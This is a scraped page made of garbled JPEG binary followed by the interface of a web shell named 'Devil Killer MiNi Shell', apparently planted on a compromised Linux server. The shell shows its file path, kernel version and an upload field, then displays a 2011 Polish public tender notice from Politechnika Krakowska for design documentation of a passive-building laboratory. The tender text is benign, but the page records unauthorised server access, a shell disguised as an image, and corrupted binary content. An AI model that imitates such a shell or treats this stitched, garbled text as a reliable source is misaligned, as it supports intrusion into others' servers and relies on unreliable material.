JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20111021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20111021/276851-N-2011.html

<p class="kh_header"><b>Kraków: Wykonanie wielobranżowej dokumentacji projektowo - kosztorysowej  budynku Małopolskiego Laboratorium Budownictwa Pasywnego Politechniki Krakowskiej, ul. Warszawska 24</b><br>
<b>Numer ogłoszenia: 276851 - 2011; data zamieszczenia: 21.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 12 628 26 56; 628 22 20, faks 12 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wielobranżowej dokumentacji projektowo - kosztorysowej  budynku Małopolskiego Laboratorium Budownictwa Pasywnego Politechniki Krakowskiej, ul. Warszawska 24.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie wielobranżowej dokumentacji projektowo - kosztorysowej  budynku Małopolskiego Laboratorium Budownictwa Pasywnego Politechniki Krakowskiej, ul. Warszawska 24. 
Adres obiektu:
Kampus Politechniki Krakowskiej
ul. Warszawska 24
działki o numerach ewidencyjnych: 3/11, 3/12, 3/5, 3/8, 4/1, 4/2, 63 obręb Śródmieście

Inwestor:
Politechnika Krakowska im. Tadeusza Kościuszki w Krakowie
ul. Warszawska 24,  31-155 Kraków
Małopolskie Laboratorium Budownictwa Pasywnego projekt, z którego możliwe jest dofinansowanie z Małopolskiego Regionalnego Programu  Operacyjnego zgodnie z Osią priorytetową  5 - Krakowski Obszar Metropolitarny  - Działanie 5.1. KOM jako ważny węzeł europejskiej przestrzeni badawczej 

Przedmiotem zamówienia jest wykonanie dokumentacji projektowej w następującym zakresie:
­	Wielobranżowy projekt budowlany 
­	Wielobranżowy projekt wykonawczy
­	Sporządzenie specyfikacji technicznych wykonania i odbioru robót dla wszystkich branż
­	Sporządzenie przedmiarów i kosztorysów inwestorskich 
­	Sporządzenie informacji dotyczącej planu BIOZ


1.	Szczegółowy zakres opracowania:

1.1.	Wielobranżowy projekt budowlany na podstawie przedłożonego programu funkcjonalno - użytkowego, koncepcji architektonicznej oraz koncepcji konstrukcji obejmujący:

1.1.1.	Projekty instalacji sanitarnych w zakresie:
projekt instalacji wentylacji/klimatyzacji/ogrzewania (HVAC) w skład w którego wchodzi:
a)	Obliczenie zysków i strat ciepła zarówno dla okresu letniego jak i zimowego, wykonanych zgodnie z obowiązującymi normami i dyrektywami;
b)	Szczegółowy projekt instalacji wentylacji budynku z uwzględnieniem różnych typów pasywnego i aktywnego odzysku ciepła i zimna ze źródeł naturalnych (wymiennik GWC, rekuperator i regenerator ciepła itp.) - zgodnie z koncepcją przekazaną przez zleceniodawcę (załącznik nr 1);
c)	Projekt klimatyzacji obiektu z podziałem na strefy laboratoryjną, komercyjną i wybranych pomieszczeń laboratoryjnych, z uwzględnieniem najnowszych technologii w zakresie oszczędności energii w tym zakresie (chłodzenie naturalne aktywne i pasywne, itp.)  - zgodnie z koncepcją przekazaną przez zleceniodawcę (załącznik nr 1)
d)	Projekt ogrzewania obiektu z podziałem na strefy laboratoryjną, komercyjną i wybranych pomieszczeń laboratoryjnych z uwzględnieniem najnowszych technologii w zakresie niekonwencjonalnych źródeł ciepła (trigeneracja i pompy ciepła typu ciecz-woda i powietrze-woda, baterie solarne, itp.) - zgodnie z koncepcją przekazaną przez zleceniodawcę (załącznik nr 1);
e)	Projekty układów hydraulicznych służących do dystrybucji ciepła i zimna w obiekcie ze szczególnym uwzględnieniem układów do pomiaru wydajności w wybranych punktach instalacji;
f)	Projekty systemu CWU z doborem wielkości zasobnika oraz z wykorzystaniem wszystkich możliwych sposobów zasilania w ciepło pochodzące ze źródeł naturalnych oraz ciepła odpadowego, które mogą występować w obiekcie;
g)	Opracowanie wytycznych do układu sterowania i regulacji poszczególnych instalacji z podziałem na strefy i wybrane pomieszczenia laboratoryjne;

projekt instalacji wentylacji ppoż -zabezpieczającej poziome i pionowe drogi ewakuacyjne przed zadymianiem
projekt instalacji wodnej i kanalizacyjnej

1.1.2.	Projekty instalacji elektrycznych i słaboprądowych w zakresie:

instalacje elektryczne wewnętrzne
instalacje oświetlenia normalnego i awaryjnego
instalacji gniazd wtyczkowych
instalacja odgromowa, uziemień i połączeń wyrównawczych
instalacja bezpieczeństwa
instalacja monitoringu CCTV
instalacja antywłamaniowa
instalacja telefoniczna zintegrowana z systemem sieci komputerowej
instalacji nagłośnienia w tym audio/video
instalacji kontroli dostępu
sygnalizacji pożaru SAP
projekt Układu Sterowania i Akwizycji Danych (USAD) w skład którego wchodzi:
a)	projekt sieci komputerowej wewnętrznej  umożliwiającej komunikację pomiędzy serwerem głównym oraz terminalami komputerowymi i sterownikami lokalnymi (w które będą wyposażone poszczególne laboratoria, stanowiska pomiarowe, przyrządy pomiarowe, urządzenia HVAC, systemy oświetlenie itp.)
b)	projekt wyposażenia serwerowni oraz pozostałych pomieszczeń obiektu  (specyfikacja jednolitego i spójnego wyposażenia hardwarowego całego obiektu
c)	integracja wszystkich urządzeń w jednym oprogramowaniu  serwera i terminali (jeden, otwarty  protokół komunikacyjny), które umożliwi realizację następujących celów:
-	możliwość komunikacji z każdym urządzeniem pomiarowym i wykonawczym zlokalizowanym w obiekcie (ilość bliżej nie określona (>1000)
-	możliwość tworzenia dynamicznych enklaw regulacyjnych (w oparciu o sterowniki peryferyjne lub lokalne)
-	możliwość wizualizacji pracy i odczytów ze wszystkich urządzeń w które obędzie wyposażony obiekt
-	wielopoziomowa kontrola dostępu i odpowiednie zabezpieczenia przed atakami z zewnątrz
-	możliwość gromadzenia danych pomiarowych w czasie rzeczywistym 
-	możliwość transferu danych pomiarowych do arkusza exel.
d)	projekt układu sterowania central klimatyzacyjnych (wg algorytmu podanego przez zleceniodawcę)
e)	projekt sterowania systemu tri generacyjnego (wg algorytmu podanego przez zleceniodawcę)
f)	specyfikacja parametrów i wymagań umożliwiających współpracę z systemem USAD dla:
-	wszystkich czujników, urządzeń pomiarowych i układów pomiarowych
-	siłowników urządzeń wykonawczych (zawory, przepustnice, pompy, regulatory przepływu powietrza)
-	dla sterowników firmowych urządzeń energetycznych (agregaty ziębnicze, pompy ciepła, oświetlenie  itp.)

1.1.3. Projekty przyłączy
energii cieplnej - z istniejącej sieci ciepłowniczej
gazu - z istniejącego gazociągu
wody - z istniejącej sieci wodociągowej
kanalizacji sanitarnej - z istniejącej sieci ks
kanalizacji opadowej - z istniejącej sieci wewnętrznej
energii elektrycznej

1.2. Wielobranżowy projekt wykonawczy
-	projekty wykonawcze mają uzupełniać i uszczegółowiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego i realizacji robót budowlanych 
1.3. Pozostałe elementy dokumentacji
-sporządzenie specyfikacji technicznych wykonania i odbioru robót dla wszystkich branż zgodnie z Rozdziałem 3 Rozporządzenia Ministra Infrastruktury z dnia 2 wrzenia 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robot budowlanych oraz program funkcjonalno-użytkowego. (Dz. U. Nr 202, poz. 2072 z 2004 r. ze zm.)

-sporządzenie przedmiarów i kosztorysów inwestorskich dla wszystkich branż oddzielnie
przedmiar robót z podziałem na poszczególne branże - sporządzany zgadnie z Rozdziałem 2 Rozporządzenia Ministra Infrastruktury z dnia 2 wrzenia 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz program funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z 2004 r. ze zm.). Poszczególne pozycje przedmiarowe muszą szczegółowo opisywać zaprojektowane materiały i przyjęte technologie oraz zawierać wyliczenie Ilości robót.
kosztorys inwestorski z podziałem na poszczególne branże, sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kasztów prac projektowych oraz planowanych kasztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U. Nr 130 poz. 1389 z 2004 r.), łącznie z obowiązkiem jego aktualizacji

-sporządzenie informacji dotyczącej planu BIOZ
zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia. (Dz. U. Nr 120, poz. 1126 z 2003 r. ze zm.)
-sporządzenie instrukcji bezpieczeństwa pożarowego
sporządzona zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7.06.2010 r. w sprawie ochrany przeciwpożarowej budynków, innych obiektów budowlanych i terenów. (Dz. U. Nr 109, poz. 719 z 2010 r.)

-sporządzenie dokumentacji geologicznej i geotechniczna poprzedzona szczegółowym rozpoznaniem terenu zawierająca min. 15 odwiertów 
-rozpoznanie terenowo-prawne gruntów do celów projektowych ( inwentaryzację stanu istniejącego własności gruntów, uzyskanie wypisów i wyrysów z rejestru gruntów, odpisów z Ksiąg Wieczystych, itp),
-wykonanie wszelkich badań, ekspertyz, pomiarów oraz ewentualnych projektów budowli i budynków pomocniczych, zabezpieczających, towarzyszących , rozbiórek niezbędnych do prawidłowej realizacji inwestycji.
-zyskanie uzgodnień z zakresu ochrony p.poż., wymagań sanitarno-higienicznych (SANEPID), bezpieczeństwa i higieny pracy oraz ergonomii(BHP),
-wykonanie wszelkich niezbędnych dokumentów do pozwolenia na budowę, 
-uzyskanie warunków technicznych do projektowania w zakresie przyłączy mediów
-w razie konieczności uzyskanie decyzji o środowiskowych uwarunkowaniach oraz wypełnienie wniosku i wykonanie wszystkich opracowań niezbędnych do uzyskania przedmiotowej decyzji.
-uzgodnienie projektu z Zespołem Uzgadniania Dokumentacji, z właścicielami sieci uzbrojenia terenu, zarządcami dróg, w zakresie zgodności z przepisami bezpieczeństwa i higieny pracy, sanitarnymi, przeciwpożarowymi, uzgodnienie projektów urządzeń wymagających dozoru technicznego, oraz dokonanie wszelkich innych uzgodnień wynikających z obowiązujących przepisów.
-uzgadnianie przedmiotu umowy z Zamawiającym, uwzględnianie wszystkich uwag do przedmiotu umowy w zakresie: treści, zakresu, rozwiązań technologicznych, ekonomicznych, błędów ortograficznych, stylistycznych, formy złożenia, oprawienia, estetyki, zgodności z innymi dokumentami, kompletności, itp.

1.4. Forma opracowania dokumentacji:
a) Wersja papierowa:
-	5 egz. projektu budowlanego + BIOZ
-	3 egz. projektu wykonawczego
-	2 egz. przedmiaru robót
-	2 egz. kosztorysu inwestorskiego
-	2 egz. STWiOR
b) Wersja elektroniczna:
-	2 komplety na płytkach CD w wersji pdf zawierające:
           projekt budowlany + BIOZ
           projekt wykonawczy
           przedmiar robót
           STWiOR
      - 1x wersja na płytkach CD kosztorysów inwestorskich w wersji pdf
      - 2 komplety na płytkach CD w wersjach edytowanych : dwg, doc w programach Zuzia, Rodos, Norma
projekt budowlany + BIOZ
projekt wykonawczy
przedmiar robót
kosztorys inwestorski
STWiOR.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. 
Zamawiający uzna warunek za spełniony, jeśli Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert (jeżeli okres prowadzenia działalności jest krótszy, w tym okresie ) :
1. wykonał minimum trzy projekty budowy, przebudowy lub zmiany sposobu użytkowania budynków użyteczności publicznej w zakresie instalacji:  (HVAC) wentylacji mechanicznej, klimatyzacji,  centralnego ogrzewania, wodno-kanalizacyjnej 
oraz
2. wykonał minimum dwa projekty w zakresie instalacji elektrycznej, elektrycznej słaboprądowej, sieci komputerowej i automatyki. 

Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie wykazu zrealizowanych zamówień i dokumentów potwierdzających że usługi zostały wykonane należycie

Przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości kultury, kultu religijnego, oświaty,, szkolnictwa wyższego, nauki, opieki zdrowotnej i socjalnej, obsługi bankowej, handlu gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim, śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji w tym także budynek biurowy i socjalny)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
Za dysponującego osobami zdolnymi do wykonania zamówienia uzna się Wykonawcę, który  będzie dysponował zespołem projektowym w składzie:
wielobranżowy zespół projektowy składający się z osób posiadających odpowiednie uprawnienia budowlane do projektowania bez ograniczeń, przynależnych do właściwej izby zawodowej w specjalnościach: 
-	instalacyjnej w zakresie instalacji i urządzeń cieplnych oraz wentylacji 
-	instalacji sanitarnych  
-	instalacji i urządzeń elektrycznych i elektroenergetycznych.

Ocena spełniania warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie załączonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji  niezbędnego do należytego wykonania zamówienia , oraz informacją o podstawie dysponowania tymi osobami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - Załącznik nr 2 do SIWZ
Pisemne zobowiązanie podmiotu(ów) do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów - Załącznik nr 7 (jeżeli dotyczy)
Opcjonalnie, jeśli występuje pełnomocnik - pełnomocnictwo (w oryginale lub notarialnie potwierdzonej kopii) dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają zgody stron wyrażonej w formie pisemnego aneksu pod rygorem nieważności.
2.	Zamawiający dopuszcza możliwość zmiany umowy w zakresie:
1)	 Zmiany terminu realizacji przedmiotu zamówienia,  w przypadku uniemożliwienia rozpoczęcia realizacji umowy lub zaistnienia przerw w jej wykonaniu z przyczyn nie leżących po stronie Wykonawcy. Termin wykonania prac ulegnie przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia prac. 
2)	Zamawiający dopuszcza możliwość zmiany personelu Wykonawcy wskazanego 
w ofercie na uzasadniony wniosek (wypadek losowy, utrata zdrowia itp.) wykonawcy z zachowaniem wymogów SIWZ w zakresie żądanych kwalifikacji 
i uprawnień.
3)	Zmiany w zakresie przedmiotu zamówienia, jeżeli konieczność wprowadzenia zmiany wynika ze zmiany przepisów regulujących wykonanie prac projektowych stanowiących przedmiot umowy.
3.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego oraz przez Wykonawcę.
4.	Warunkiem dokonania zmian w umowie jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: opis propozycji zmian, uzasadnienie zmian, opis wypływu zmiany na termin wykonania umowy.
5.	Wykonawca nie będzie uprawniony do wnioskowania o przedłużenie terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli konieczność dokonania zmiany została spowodowana przez jakikolwiek błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem jakiegokolwiek dokumentu wynikającego z obowiązków Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl<br>
